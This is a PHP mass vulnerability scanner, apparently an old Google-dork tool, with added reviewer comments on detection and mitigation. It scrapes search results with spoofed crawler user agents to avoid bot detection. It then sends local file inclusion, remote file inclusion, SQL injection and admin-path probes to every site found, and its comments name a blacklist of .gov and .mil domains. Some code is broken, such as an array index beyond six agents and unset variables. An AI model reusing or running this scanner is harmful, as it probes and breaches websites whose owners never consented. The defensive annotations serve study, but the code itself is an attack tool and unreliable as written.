*/
// Review summary (defender view).
// Input: POST fields `dork` (a search query) and `vuln_type` (ADMIN, LFI, SQLI or RFI).
// Flow: fetch Google result pages for the query, pull every http(s) href out of the
// returned HTML, drop blacklisted domains, then send one or two probe requests per
// remaining URL and print "[+]" or "[-]" for each.
// $how_many, $passwd and $my_rfi are read below but not assigned in the visible part of
// the file; presumably they are set above the comment that ends on the first line.
// NOTE(review): the echo strings look like they lost their HTML markup when this page was
// extracted; they are kept exactly as shown.

// Errors are hidden and the execution-time limit is removed, so a run is silent and unbounded.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '9999M');
$scan_count = 0;
$success = 0;
$failrate = 0;
$query = stripslashes($_POST['dork']);
if ($query == '') {
    // Shown when no query was posted (presumably the input form; only the text survives).
    echo "
Query
";
}
if ($query != '' ) {
    $scan_type = $_POST['vuln_type'];
    // useragents to bypass google captcha bullshit and stop google detecting the bot
    // Review: these strings imitate Yahoo crawlers and are applied only to the curl
    // request sent to the search engine below. The probe requests further down use
    // get_headers()/file_get_contents() without a stream context, so this header is not
    // set on them by this code.
    $agents = array('Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)',
        'Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)',
        'YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users …; views …)',
        'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)',
        'Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
        'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)');
    $rounds = 10 * $how_many;
    $started_rounds = 0;
    $counted = 10;
    // One iteration per result page; the `start` offset advances by 10 each time.
    while ($started_rounds <= $rounds) {
        $counted++;
        $rand = rand('0', '23');
        $useragent = $agents[$rand];
        $transf = curl_init();
        curl_setopt($transf, CURLOPT_USERAGENT, $useragent);
        curl_setopt($transf, CURLOPT_RETURNTRANSFER, 1);
        // Review: the posted query is placed into the URL as-is (no urlencode).
        curl_setopt($transf, CURLOPT_URL, "http://www.google.com/search?q=$query&hl=en&start=$started_rounds&sa=N");
        $file = curl_exec($transf);
        curl_close($transf);
        // Collect the target of every href that starts with "http" in the result page.
        preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $file, $ok);
        $count = count($ok[1]);
        $started_rounds = $started_rounds + 10;
        for ($counted = 0; $counted < $count ; $counted++) {
            $url = "http" . $ok[1]["$counted"];
            // Remove scheme/"www." fragments, then keep what precedes the first "/" as the domain.
            $url2 = eregi_replace("http://|https|www.", "", $url);
            $total = strlen($url2);
            $pos = strpos($url2, "/");
            $sum = $total -$pos;
            $domain = substr($url2, 0, -$sum);
            // filter out the shit...
            // This is your blacklist, be sure to separate the url, and to eliminate subdomains add the main site and then .site as well
            if (eregi("youtube.com|google.com|googleusercontent.com|facebook.com|photobucket.com|.mil|.gov|.edu|.au|.go", $domain)) {
                $domain = '';
            }
            if ($domain != '' && $domain != ':') {
                if ($scan_type == 'ADMIN') {
                    // admin finder
                    // Review: requests http://<domain>/admin/ and http://<domain>/adm/ and
                    // counts a hit when the first response header line contains "200".
                    // Detection: the same client asking for both paths back to back.
                    // Mitigation: require authentication on administrative paths instead
                    // of relying on them being unknown.
                    $scan_for = array('admin', 'adm');
                    $host = $domain;
                    foreach ($scan_for as $scan){
                        $scan_count++;
                        $headers= get_headers("http://$domain/$scan/");
                        if (eregi('200', $headers[0])) {
                            echo "
[+]$host/$scan";
                            $success++;
                        } else {
                            echo "
[-]$host/$scan";
                            $failrate++;
                            // do something here
                        }
                    }
                } else {
                    if ($scan_type == 'LFI') {
                        // Review: only URLs containing "=" are probed. Everything after the
                        // first "=" is replaced with $passwd (set outside this view), and a
                        // second variant appends "%00". A hit is a response containing
                        // "root:x:0".
                        // Detection: a parameter value swapped for a file path, repeated
                        // with a trailing %00.
                        // Mitigation: never build include/file paths from request
                        // parameters; map parameters to an allow-list of known files.
                        if (!eregi("=", $url)) {
                            $url = '';
                        }
                        if ($url != ''){
                            $scan_count++;
                            $clean = explode('=', $url);
                            $test2 = "$clean[0]=$passwd";
                            $test3 = "$clean[0]=$passwd%00";
                            $exploit_1 = file_get_contents($test2);
                            if (eregi("root:x:0", $exploit_1)) {
                                echo "
[+]$test2";
                                $success++;
                            } else {
                                $exploit_2 = file_get_contents($test3);
                                if (eregi("root:x:0", $exploit_2)) {
                                    echo "
[+]$test3";
                                    $success++;
                                } else {
                                    $failrate++;
                                    echo "
[-]$test2";
                                    echo "
[-]$test3";
                                }
                            }
                        }
                    } else {
                        if ($scan_type == 'SQLI') {
                            // Review: every "=" in the URL gets a single and a double quote
                            // appended, and a hit is any response whose visible text
                            // contains one of the listed words (database, error, query,
                            // ...). The check keys on error text, so a "[+]" line is not
                            // proof of injection, since ordinary pages can contain these words.
                            // Detection: parameter values that begin with '" .
                            // Mitigation: parameterized queries, and no database error
                            // text in responses.
                            if (!eregi("=", $url)) {
                                $url = '';
                            }
                            if ($url != ''){
                                $scan_count++;
                                $clean = str_replace("=", "='". '"', $url);
                                $exploit_1 = file_get_contents($clean);
                                if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags(html_entity_decode($exploit_1) ) , $useless)) {
                                    echo "
[+]$clean";
                                    $success++;
                                } else {
                                    echo "
[-]$clean";
                                    $failrate++;
                                }
                            }
                        } else {
                            if ($scan_type == 'RFI') {
                                // Review: same shape as the LFI branch, but the parameter
                                // value becomes $my_rfi (set outside this view), with and
                                // without "%00". A hit is a response containing the marker
                                // "Scanned by -null- scanner v2".
                                // Detection: the replaced parameter value in request logs;
                                // the marker string in content fetched by the web server.
                                // Mitigation: keep allow_url_include disabled and never
                                // include a path taken from the request.
                                if (!eregi("=", $url)) {
                                    $url = '';
                                }
                                if ($url != ''){
                                    $scan_count++;
                                    $clean = explode('=', $url);
                                    $test2 = "$clean[0]=$my_rfi";
                                    $test3 = "$clean[0]=$my_rfi%00";
                                    $exploit_1 = file_get_contents($test2);
                                    if (eregi("Scanned by -null- scanner v2", $exploit_1)) {
                                        echo "
[+]$test2";
                                        $success++;
                                    } else {
                                        $exploit_2 = file_get_contents($test3);
                                        if (eregi("Scanned by -null- scanner v2", $exploit_2)) {
                                            echo "
[+]$test3";
                                            $success++;
                                        } else {
                                            $failrate++;
                                            echo "
[-]$test2";
                                            echo "
[-]$test3";
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    if ($success == '') {
        $success = 0;
    }
    if ($failrate == '') {
        $failrate = 0;
    }
    // Summary. Review: $query comes straight from the POST body and is written to the
    // page without HTML escaping.
    echo "




Total scanned urls: $scan_count
Successful scans $success
Failed scans $failrate
Search query $query";
}
// Review: writes the body of the last search response into the page unescaped; when no
// query was posted, $file was never assigned.
echo $file;
?>